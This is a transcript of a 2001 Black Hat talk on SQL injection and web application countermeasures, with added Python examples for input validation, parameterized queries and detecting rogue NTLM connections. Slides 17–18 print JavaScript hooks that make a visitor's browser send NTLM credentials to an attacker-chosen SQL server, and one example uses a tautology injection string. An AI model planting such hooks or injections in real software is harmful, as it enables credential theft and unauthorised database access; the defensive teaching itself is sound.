Welcome to Blackhat! Blackhat Security Briefings, Amsterdam 2001. Timothy M. Mullen, AnchorIS.Com, Inc. (slide transcript)

Upload: luke-armstrong, posted 27-Dec-2015


Page 1: Welcome to Blackhat!

Blackhat Security Briefings
Amsterdam 2001
Timothy M. Mullen, AnchorIS.Com, Inc.

Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; [email protected]

Page 2: Web Vulnerability and SQL Injection Countermeasures

Securing your servers from the most insidious of attacks:

The demands of the Global Marketplace have made web development more complex than ever. With customer demands and competitive influences, the functions our applications must be capable of performing constantly push our development into new areas.

Even with enterprise firewall solutions, hardened servers, and up-to-date web server software in place and properly configured, poor design methodology can leave our systems open for attack.

Page 3: Session Overview

Part I:
∙ Vulnerabilities: Client-side HTML, URL Manipulation, SQL Injection
∙ Countermeasures: Input Validation, Data Sanitation, Variable Typing, Procedure Structure, Permissions and ACL's.

Part II:
∙ Live Demos highlighting real-world sites with different issues, participant involvement and brainstorming
∙ SQueaL Demo (SQueaL is an NTLM-logging rogue SQL server app)

Page 4: Part I

Vulnerabilities
∙ Client-side HTML
∙ URL Manipulation
∙ SQL Injection

Countermeasures
∙ Implementation/Setup
∙ Input Validation
∙ Data Sanitation
∙ Variable Typing
∙ Procedure Structure
∙ Permissions and ACL's

Page 5: Vulnerabilities – Lab Demos

Client-side HTML Issues
∙ Web Forms
∙ Input/Select controls
∙ Hidden Fields

URL Manipulation
∙ Editing the URL
∙ Session variables
∙ Cookies

SQL Injection
∙ The possibilities are endless!

Page 6: Countermeasures – Lab Demos

Implementation and Setup
∙ ADODB Connection Strings and DSN's
∙ ODBC Error reporting
∙ Custom error pages

Page 7: Countermeasures – Lab Demos

Input Validation
∙ Querystring count checking
∙ Data Type Validation
∙ Value/Length Checking
∙ Extents/Boundary Checking
∙ Host submission limits per unit of time
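The slide lists the five input-validation checks by name only. The following is an added example, not code from the slides, that implements all five server-side for a hypothetical product-lookup page: the SCHEMA, the parameter names id and sort, and every sample input are constructed for this illustration.

```python
"""Server-side input validation for a query string, added here as an example;
it is not code from the slides. It implements the five checks the slide lists:
query-string parameter count, data type, value/length, extents/boundary, and a
per-host submission limit per unit of time. The SCHEMA for a hypothetical
product-lookup page and every sample input are constructed for this example."""
import re
import time
from collections import defaultdict, deque
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs

# Constructed schema: the only parameters the page accepts, and their rules.
SCHEMA = {
    "id":   {"type": int, "max_len": 6, "min": 1, "max": 999999},
    "sort": {"type": str, "max_len": 10, "pattern": re.compile(r"price|name")},
}


def validate_query(qs: str) -> Tuple[bool, Dict[str, object], List[str]]:
    """Return (ok, typed_values, errors). typed_values is empty unless ok."""
    errors: List[str] = []
    typed: Dict[str, object] = {}
    raw = parse_qs(qs, keep_blank_values=True)  # repeated keys become lists

    # Querystring count checking: exactly the expected names, each supplied once.
    if set(raw) != set(SCHEMA):
        unexpected = sorted(set(raw) ^ set(SCHEMA))
        return False, {}, [f"unexpected or missing parameters: {unexpected}"]
    for key, values in raw.items():
        if len(values) != 1:
            errors.append(f"{key}: supplied {len(values)} times")
    if errors:
        return False, {}, errors

    for key, rule in SCHEMA.items():
        value = raw[key][0]
        # Value/length checking happens before any conversion or SQL use.
        if not 0 < len(value) <= rule["max_len"]:
            errors.append(f"{key}: length must be 1..{rule['max_len']}")
            continue
        if rule["type"] is int:
            # Data type validation: digits only, then a real integer conversion.
            if re.fullmatch(r"\d+", value) is None:
                errors.append(f"{key}: not an integer")
                continue
            num = int(value)
            # Extents/boundary checking against the range the page can serve.
            if not rule["min"] <= num <= rule["max"]:
                errors.append(f"{key}: {num} outside [{rule['min']}, {rule['max']}]")
                continue
            typed[key] = num
        else:
            # Data type validation for strings: an allowlist pattern, not a denylist.
            if rule["pattern"].fullmatch(value) is None:
                errors.append(f"{key}: value not in allowed set")
                continue
            typed[key] = value
    return (not errors), (typed if not errors else {}), errors


class HostRateLimiter:
    """Host submission limits per unit of time: a sliding window per client address."""

    def __init__(self, limit: int, window_seconds: float) -> None:
        self.limit = limit
        self.window = window_seconds
        self._hits: Dict[str, deque] = defaultdict(deque)

    def allow(self, host: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        hits = self._hits[host]
        while hits and now - hits[0] >= self.window:  # drop timestamps outside the window
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True


if __name__ == "__main__":
    print(validate_query("id=42&sort=price"))
    print(validate_query("id=42&sort=name'--"))
```

The order matters: the parameter count and length checks reject oversized or unexpected input before any conversion runs, and the type check produces a real integer so the value that reaches the database layer is already typed rather than a string to be trusted later.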

Page 8: Countermeasures – Lab Demos

Data Sanitation
∙ REPLACE function
∙ RegExp function
∙ Custom functions / explicit declarations

Page 9: Countermeasures – Lab Demos

Variable Typing
∙ Command object
∙ Parameter declaration
∙ Command type declaration
∙ Execute as methods

Page 10: Countermeasures – Lab Demos

SQL Stored Procedure Structure
∙ Use stored procedures whenever possible
∙ Type cast variables
∙ Create and use Views as table sources
∙ Avoid "Select *" statements for performance as well as security
∙ sp_executeSQL procedure for ad hoc queries
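Pages 8, 9 and 10 name the sanitation, variable-typing and procedure-structure countermeasures without showing them side by side with the defect they fix. The following is an added example, not code from the slides: the slides describe ADO Command objects with declared parameters, type casts and sp_executesql on SQL Server, while this example uses Python's sqlite3 as a stand-in so it runs offline. The users table, its rows, the login_view view and all inputs are constructed for this illustration.

```python
"""Data sanitation, variable typing and procedure structure in one place, added
here as an example (not code from the slides). The slides describe ADO Command
objects with declared parameters, type casts and sp_executesql for ad hoc
queries on SQL Server; this example uses Python's sqlite3 as a stand-in so it
runs offline, but the rule is the same: a value travels to the server as a typed
parameter and never as part of the SQL text. Table, rows and inputs are constructed."""
import re
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample database with a view as the table source for login checks."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    db.executemany("INSERT INTO users (name, pw) VALUES (?, ?)",
                   [("bob", "hunter2"), ("alice", "s3cret")])
    # Expose only the columns the login check needs; the base table stays locked down.
    db.execute("CREATE VIEW login_view AS SELECT name, pw FROM users")
    return db


def login_concat(db: sqlite3.Connection, name: str, pw: str) -> int:
    """The 'before' form: user input spliced into the SQL text. Returns matched rows."""
    sql = f"SELECT name FROM login_view WHERE name = '{name}' AND pw = '{pw}'"
    return len(db.execute(sql).fetchall())


def login_param(db: sqlite3.Connection, name: str, pw: str) -> int:
    """Variable typing: declared parameters, so the driver never parses the values as SQL."""
    sql = "SELECT name FROM login_view WHERE name = ? AND pw = ?"
    return len(db.execute(sql, (str(name), str(pw))).fetchall())


def sanitize_quotes(value: str) -> str:
    """The REPLACE-function approach from the Data Sanitation slide: double each quote.
    Useful as a second layer, but it only helps inside quoted string literals."""
    return value.replace("'", "''")


def login_concat_sanitized(db: sqlite3.Connection, name: str, pw: str) -> int:
    return login_concat(db, sanitize_quotes(name), sanitize_quotes(pw))


NAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def is_valid_name(value: str) -> bool:
    """RegExp/custom-function approach: allowlist the characters a user name may contain."""
    return NAME_RE.fullmatch(value) is not None


def user_by_id(db: sqlite3.Connection, user_id: str) -> Optional[str]:
    """Type cast variables: a non-numeric id raises ValueError before any SQL is built."""
    uid = int(user_id)
    row = db.execute("SELECT name FROM users WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None


ALLOWED_SORT = {"name", "id"}


def list_users(db: sqlite3.Connection, sort_col: str) -> List[str]:
    """The ad hoc (sp_executesql-style) case: identifiers cannot be parameters, so the
    column name is checked against a fixed allowlist before it enters the SQL text."""
    if sort_col not in ALLOWED_SORT:
        raise ValueError("sort column not permitted")
    return [r[0] for r in db.execute(f"SELECT name FROM users ORDER BY {sort_col}")]


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print("concatenated:", login_concat(db, "nobody", tautology), "rows")
    print("parameterized:", login_param(db, "nobody", tautology), "rows")
```

Run stand-alone, the concatenated query matches every row in the view for a caller who knows no password, while the parameterized query matches none; quote-doubling alone also closes this particular case, which is why the slides present it as one layer among several rather than the whole defence.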

Page 11: Countermeasures – Lab Demos

Permissions and ACL's
∙ Open views, but lock down tables
∙ Use groups
∙ Lock down xp_cmdshell, xp_sendmail or remove
∙ SQL Service context
∙ Integrated/Mixed security

Page 12: Web Vulnerability and SQL Injection Countermeasures – Part I Concluded

15 Minute Break

Page 13: Web Vulnerability and SQL Injection Countermeasures – Welcome Back!

Page 14: Part II

Live Web Demos and Feedback
∙ Expose potentially insecure implementations of web applications
∙ Discuss potential vulnerabilities and exploits
∙ Mitigation and Prevention

SQUeaL Demo: Grabbing NTLM responses from unsuspecting users

Page 15: Web Vulnerabilities – Live Demos

Real-world web application issues and feedback

Page 16: Web Vulnerabilities – Live Demos

SQUeaL: NTLM logging rogue SQL Server
∙ Linux server application based on DilDog's "TalkNTLM" code
∙ Waits for TCP/IP connection on 1433, and attempts to authenticate via NTLM
∙ Logs domain, username, and NTLM response

Page 17: Web Vulnerabilities – Live Demos

SQUeaL: Getting them to connect
∙ ADODB Connection (Lame)

conn = new ActiveXObject("ADODB.Connection");
// Integrated Security=SSPI: the browser authenticates with the logged-on user's Windows credentials
conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
conn.Open();

Page 18: Web Vulnerability and SQL Injection Countermeasures

SQUeaL: Getting them to connect
∙ DBNETLIB (Not so lame)

{
  ns = new ActiveXObject("SQLNS.SQLNamespace");
  // Trusted_Connection=Yes: integrated Windows authentication to the named server
  ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
}
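The two preceding slides show the client-side hooks that make a browser open an integrated-authentication SQL connection to a server the script chooses. The following is an added example, not the author's code, written from the defender's side: it scans page or script content for those ActiveX objects combined with Integrated Security=SSPI or Trusted_Connection=Yes and reports any whose server is outside an allowlist. The sample page, the address 10.10.0.5 and the allowlist networks are constructed for this illustration; the 10.1.1.1 snippet mirrors the slide.

```python
"""Defensive check for the SQueaL-style hook shown on the two preceding slides,
added here as an example (not the author's code). It scans page or script
content for client-side ActiveX database connections that use integrated
Windows authentication (Integrated Security=SSPI or Trusted_Connection=Yes)
against a server outside an allowlist: such a connection makes the browser hand
the user's NTLM response to whatever host the script names. The sample page,
the address 10.10.0.5 and the allowlist are constructed for this example."""
import ipaddress
import re
from typing import Dict, List

ACTIVEX_RE = re.compile(
    r'ActiveXObject\s*\(\s*["\'](ADODB\.Connection|SQLNS\.SQLNamespace)["\']\s*\)', re.I)
INTEGRATED_RE = re.compile(
    r'Integrated\s+Security\s*=\s*SSPI|Trusted_Connection\s*=\s*Yes', re.I)
# Connection-string server key; the value runs to the next ';' or closing quote.
SERVER_RE = re.compile(r'\b(?:Data\s+Source|Server)\s*=\s*([^;"\']+)', re.I)


def _is_trusted(host: str, trusted: List[str]) -> bool:
    """True if host is a listed hostname or an address inside a listed network."""
    host = host.strip().lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host in {t.lower() for t in trusted}
    for entry in trusted:
        try:
            if ip in ipaddress.ip_network(entry, strict=False):
                return True
        except ValueError:
            continue  # entry is a hostname, not a network
    return False


def find_ntlm_leaks(content: str, trusted: List[str]) -> List[Dict[str, str]]:
    """Report each integrated-auth ActiveX connection whose server is not trusted."""
    findings: List[Dict[str, str]] = []
    hits = list(ACTIVEX_RE.finditer(content))
    for i, m in enumerate(hits):
        # Examine the text between this object creation and the next one.
        end = hits[i + 1].start() if i + 1 < len(hits) else len(content)
        window = content[m.end():end]
        auth = INTEGRATED_RE.search(window)
        if auth is None:
            continue  # explicit credentials or no connection string: not an NTLM leak
        srv = SERVER_RE.search(window)
        server = srv.group(1).strip() if srv else "<unknown>"
        host = re.split(r"[,\\]", server)[0]  # drop ',port' or '\instance'
        if srv and _is_trusted(host, trusted):
            continue
        findings.append({"object": m.group(1), "server": server, "auth": auth.group(0)})
    return findings


# Constructed page: the first script targets an internal server, the second mirrors
# the slide's DBNETLIB hook pointed at an outside address.
SAMPLE_PAGE = """<html><body>
<script>
var conn = new ActiveXObject("ADODB.Connection");
conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Initial Catalog=pubs;Data Source=10.10.0.5;Network Library=dbnetlib';
conn.Open();
</script>
<script>
ns = new ActiveXObject("SQLNS.SQLNamespace");
ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
</script>
</body></html>"""

if __name__ == "__main__":
    for f in find_ntlm_leaks(SAMPLE_PAGE, ["10.10.0.0/16"]):
        print(f"{f['object']} -> {f['server']} using {f['auth']}")
```

The check is deliberately narrow: only a connection that both instantiates one of the two ActiveX objects and requests integrated authentication can send the user's NTLM response, so explicit-credential connection strings are ignored, and a server inside the allowlist is treated as the ordinary intranet case. An egress rule that blocks outbound TCP/1433 from workstations gives the same protection at the network layer.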

Page 19: Web Vulnerability and SQL Injection Countermeasures – Closing Remarks

Page 20: THANK YOU!

Additional Resources:
http://www.hammerofgod.com
[email protected]
http://www.securityfocus.com
http://www.sqlsecurity.com
http://heap.nologin.net/aspsec.html
http://security.devx.com/bestdefense/default.asp
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/database/database.asp